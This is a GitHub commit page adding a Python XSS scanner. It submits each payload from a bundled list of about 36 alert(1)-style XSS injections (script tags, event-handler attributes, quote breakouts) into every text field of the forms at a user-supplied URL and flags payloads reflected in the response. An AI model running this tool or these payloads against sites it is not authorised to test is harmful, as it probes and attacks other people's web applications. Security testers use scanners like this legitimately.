Skip to content

Commit d98cfc5

Browse files
committed
XSS-Scanner-Added
1 parent a7b7e83 commit d98cfc5

File tree

4 files changed

+105
-0
lines changed

4 files changed

+105
-0
lines changed

Python/XSS-Check/README.md

Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
# Description
2+
3+
A Python Script to exploit XSS Vulnerability of a URL.
4+
5+
## How to execute this Script
6+
7+
+ Run `pip install -r requirements.txt` to install the required packages.
8+
+ Run the script using `python3 XSS-Check.py`
9+
10+
## Example
11+

Python/XSS-Check/XSS-Check.py

Lines changed: 55 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,55 @@
1+
import requests
2+
from bs4 import BeautifulSoup
3+
from urllib.parse import urljoin
4+
from colorama import Fore, init, Style
5+
6+
init(autoreset=True)
7+
8+
# Get all forms of the mentioned URL
9+
def getAllForms(url):
10+
page = requests.get(url)
11+
parser = BeautifulSoup(page.content, 'html.parser')
12+
return parser.find_all('form')
13+
14+
f = open("payloads.txt", "r").readlines()
15+
16+
successful_payloads = []
17+
18+
def xss():
19+
forms = getAllForms(url)
20+
for form in forms:
21+
# Getting Payload Scripts for Payloads file
22+
for payload in f:
23+
# Getting the URL where the form data will be sent
24+
action = form.attrs.get('action').lower()
25+
finalURL = urljoin(url, action)
26+
# Getting the Method through which form data will be sent (GET/POST)
27+
# By default, the method is GET
28+
method = form.attrs.get('method', 'get').lower()
29+
# Filling the Form with Random Data basically the script from Payloads
30+
randomData = {}
31+
for input in form.find_all('input'):
32+
if input['type'] == 'text' or input['type'] == 'search':
33+
input['value'] = payload
34+
inputName = input.get('name')
35+
inputValue = input.get('value')
36+
if inputName and inputValue:
37+
randomData[inputName] = inputValue
38+
if method=='post':
39+
content = requests.post(finalURL, data=randomData)
40+
else:
41+
content = requests.get(finalURL, params=randomData)
42+
43+
# Return True if Payload was successfully Injected
44+
if payload in content.text:
45+
successful_payloads.append(payload)
46+
print(Fore.CYAN + "\nPayload Injected Successfully --> " + Fore.YELLOW + payload)
47+
48+
49+
url = input(Fore.BLUE + "\nEnter the URL: ")
50+
vulnerable = xss()
51+
52+
if len(successful_payloads):
53+
print(Fore.GREEN + "\nSite is vulnerable to XSS Attack!")
54+
else:
55+
print(Fore.RED + Style.BRIGHT + "\nXSS Vulnerability not Present!")

Python/XSS-Check/payloads.txt

Lines changed: 36 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,36 @@
1+
<body onafterprint=alert(1)>
2+
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>
3+
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss>
4+
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss>
5+
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
6+
<audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
7+
<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
8+
<body onhashchange="alert(1)">
9+
<body onload=alert(1)>
10+
<audio onloadeddata=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
11+
<body onpageshow=alert(1)>
12+
<body onresize="alert(1)">
13+
<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
14+
<details ontoggle=alert(1) open>test</details>
15+
<input onauxclick=alert(1)>
16+
<a onbeforecopy="alert(1)" contenteditable>test</a>
17+
<a onbeforecut="alert(1)" contenteditable>test</a>
18+
<input onchange=alert(1) value=xss>
19+
<xss onclick="alert(1)">test</xss>
20+
<xss onkeydown="alert(1)" contenteditable>test</xss>
21+
<xss onmousedown="alert(1)">test</xss>
22+
<form onsubmit=alert(1)><input type=submit>
23+
<script>alert(123);</script>
24+
<ScRipT>alert("XSS");</ScRipT>
25+
<script>alert(123)</script>
26+
<script>alert("HACKED");</script>
27+
<script>alert(“XSS”)</script>
28+
<script>alert(“XSS”);</script>
29+
<script>alert(‘XSS’)</script>
30+
“><script>alert(“XSS”)</script>
31+
<script>alert(/XSS”)</script>
32+
<script>alert(/XSS/)</script>
33+
</script><script>alert(1)</script>
34+
‘; alert(1);
35+
‘)alert(1);//
36+
<ScRiPt>alert(1)</sCriPt>

Python/XSS-Check/requirements.txt

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,3 @@
1+
bs4==0.0.1
2+
colorama==0.4.3
3+
requests==2.24.0

0 commit comments

Comments
 (0)